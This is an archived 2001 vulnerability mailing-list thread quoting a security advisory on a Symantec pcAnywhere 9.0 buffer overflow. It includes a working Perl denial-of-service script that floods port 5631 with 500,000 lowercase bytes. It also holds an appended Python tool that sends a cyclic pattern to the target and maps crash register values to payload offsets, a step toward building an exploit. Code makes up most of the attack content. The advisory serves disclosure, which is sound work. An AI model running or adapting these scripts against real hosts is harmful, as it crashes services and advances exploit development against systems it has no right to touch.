Vulnerability Development mailing list archives

Re: Symantec pcAnywhere 9.0 DoS / Buffer Overflow


From: Eddie Harari <eddieh () YOU-NIVERSITY COM>
Date: Mon, 12 Feb 2001 10:28:16 +0200

Hi,

 I could not repeat this Overflow on a Win2K.

 Just thought you would like to know ...


-----Original Message-----
From: Zoa_Chien [mailto:zoachien () SECURAX ORG]
Sent: Monday, February 12, 2001 1:22 AM
To: VULN-DEV () SECURITYFOCUS COM
Subject: Symantec pcAnywhere 9.0 DoS / Buffer Overflow


=============================================================================
Securax-SA-14                                               Security Advisory
belgian.networking.security                                             Dutch
=============================================================================
Topic:          Symantec pcAnywhere 9.0 DoS / Buffer Overflow
Announced:      2001-02-08
Affects:        Symantec PcAnywhere 9.0 on Microsoft Windows 98 SE
=============================================================================



  Note: This  entire  advisory has been based upon trial and error results. We
        cannot ensure the information  below is 100% correct, being that we do
        not have any source code to audit.  This document is subject to change
        without prior notice.

        If you happen to find more information / problems concerning the below
        problem  or  further variants, please contact me on the following email
        incubus () securax net, or you can contact info () securax org.


  I.  Problem Description
  -----------------------

  Symantec PcAnywhere is a program that  will allow others (who are authorised
  to have access :)) to use your pc. It's similar to a Windows NT 4.0 terminal
  server.

  PcAnywhere (when it's configured to 'be a host pc') listens on 2 ports, 5631
  (pcanywheredata, according to nmap) and 65301 (pcanywhere).  And when a user
  sends certain data in a particular way, pcAnywhere will crash.

  When a large amount  (it depends,  sometimes the host will go down with 320k
  characters, sometimes you will have to send 500k bytes of data) is sent to
  a 'waiting' host on  the pcanywheredata port, "AWHOST32.EXE" will crash, and
  give an error on the screen, and write the "Unexpected program error"  to a
  logfile. (with EAX, EBX, ... so read them, you'll find the yummy 0x61616161)

  Oh yeah, don't use uppercase characters, as PcAnywhere won't crash on them.

  Why no exploit, just a lame Denial of Service?

    1.) because I suck in win32 debugging / overflowing (but i'm reading)
        /* so if I can overflow win32 progs, i'll code an exploit */
    2.) as the amount of data is variable, it's hard to overflow..

  The DoS code:

  <--bof-->

   #!/usr/bin/perl

   # Symantec PcAnywhere 9.0 Denial of Service
   # -----------------------------------------
   #          by incubus <incubus () securax net>
   #                       http://www.hexyn.be
   #
   #                    http://www.securax.net
   # All my love to Tessa.
   # Greetz to: f0bic, r00tdude, t0micron, senti, vorlon, cicero,
   #            Zym0tic, segfault, #securax () irc hexyn be
   # Thanks to jurgen swennen, for letting me (ab)use his computer.
   #
   # this is intended as proof of concept, do not abuse!

   use strict;
   use warnings;
   use IO::Socket;

   # Check the argument before touching it.
   if (@ARGV < 1) {
       print "use it like: $0 <hostname>\n";
       exit();
   }
   my $host = $ARGV[0];
   my $port = 5631;    # pcanywheredata

   my $socket = IO::Socket::INET->new(Proto    => "tcp",
                                      PeerAddr => $host,
                                      PeerPort => $port)
       or die "damn, could not connect to $host:$port: $!\n";
   print "hello\n";

   # 500000 lowercase 'a' (0x61) bytes; uppercase does not trigger the crash.
   my $buf = "\x61" x 500000;
   print $socket "$buf\n";
   close($socket);
   exit();

  <--eof-->


  II. Impact
  ----------

  If someone exploits this, then Symantec is forced to rename this product to
  PcAnyoneAnywhere or something...

  No, seriously, this could lead to a compromise of a system.


  III. possible workarounds
  -------------------------

  This advisory was also  sent to Symantec (info () symantec com), we'll see what
  they do with it...

  IV credits
  ----------
  love to Tessa.
  greetz go out to : f0bic, r00t, Zym0t1c, vorlon, cicer0, tomicron, segfau|t,
                     and so many, many  others I forgot...


=============================================================================
For more information
incubus () securax org
Website
http://www.securax.org
Advisories/Text
http://www.securax.org/pers
-----------------------------------------------------------------------------
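The advisory's PoC fills the buffer with a single byte, so the 0x61616161 it reports in the register dump only says that a register was overwritten with 'a's, not from which position in the 320k to 500k payload. The following is an added example (not part of the Securax advisory, its Perl PoC, or this thread) that replaces the uniform filler with a lowercase-only cyclic pattern, so that a register value copied out of the "Unexpected program error" log can be mapped back to a byte offset in the payload. It assumes two things the advisory does not establish: that the register value comes from the attacker-supplied buffer, and that a non-uniform lowercase buffer still triggers the crash. The function names (lowercase_pattern, offsets_for_register, send_payload) are this example's own.

```python
"""Lowercase-only cyclic pattern for locating a crash offset.

Added example, not part of the Securax advisory or its Perl PoC.
Assumptions (not established by the advisory): the 0x61616161 seen in the
register dump comes from the attacker-supplied buffer, and a non-uniform
lowercase buffer still triggers the crash.  Function names are this
example's own.
"""
import socket
import sys

# Lowercase only: the advisory reports that uppercase does not crash the host.
ALPHABET = b"abcdefghijklmnopqrstuvwxyz"
ORDER = 4          # one 32-bit x86 register holds 4 bytes
PORT = 5631        # pcanywheredata
PAYLOAD_LEN = 500000


def de_bruijn(alphabet, n):
    """Linear form of the De Bruijn sequence B(k, n) over `alphabet`.

    Every n-symbol window of the (cyclic) sequence occurs exactly once, so
    the k**n symbols give k**n distinct windows.  Standard Lyndon-word
    construction.
    """
    k = len(alphabet)
    a = [0] * (k * n)
    seq = []

    def db(t, p):
        if t > n:
            if n % p == 0:
                seq.extend(a[1:p + 1])
        else:
            a[t] = a[t - p]
            db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                db(t + 1, t)

    db(1, 1)
    return bytes(alphabet[i] for i in seq)


_BASE = None


def lowercase_pattern(length):
    """`length` bytes of pattern.  Within the first len(ALPHABET)**ORDER
    bytes every 4-byte window is unique; beyond that the pattern repeats,
    so an offset is unique only modulo that period."""
    global _BASE
    if _BASE is None:
        _BASE = de_bruijn(ALPHABET, ORDER)
    reps = length // len(_BASE) + 1
    return (_BASE * reps)[:length]


def register_bytes(value):
    """Bytes a little-endian x86 register shows after being loaded from the
    buffer: 0x61616161 -> b'aaaa', 0x64636261 -> b'abcd'."""
    return value.to_bytes(4, "little")


def offsets_for_register(pattern, value):
    """All byte offsets in `pattern` that would put `value` in a register.
    An empty list means the value did not come from this pattern."""
    needle = register_bytes(value)
    hits = []
    i = pattern.find(needle)
    while i != -1:
        hits.append(i)
        i = pattern.find(needle, i + 1)
    return hits


def send_payload(host, port, payload):
    """Deliver the payload the way the advisory's PoC does: one connection,
    one write, close.  Returns the number of bytes written."""
    data = payload + b"\n"
    with socket.create_connection((host, port), timeout=10) as s:
        s.sendall(data)
    return len(data)


if __name__ == "__main__":
    if len(sys.argv) == 3 and sys.argv[1] == "send":
        n = send_payload(sys.argv[2], PORT, lowercase_pattern(PAYLOAD_LEN))
        print("sent", n, "bytes")
    elif len(sys.argv) == 3 and sys.argv[1] == "find":
        # e.g. "find 61616161": the EAX value from the log, given as hex
        hits = offsets_for_register(lowercase_pattern(PAYLOAD_LEN), int(sys.argv[2], 16))
        print(hits)
    else:
        print(f"usage: {sys.argv[0]} send <host> | find <hex register value>")
```

Only 26^4 = 456976 distinct 4-byte lowercase windows exist, so a 500000-byte pattern repeats after that point and a register value can map to two offsets (0x61616161 itself maps to 0 and 456976); offsets_for_register returns every candidate rather than guessing. Extending the alphabet (digits, for instance) would lengthen the unique span, but the advisory only reports that lowercase crashes the host and uppercase does not, so this example stays with what it reports.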

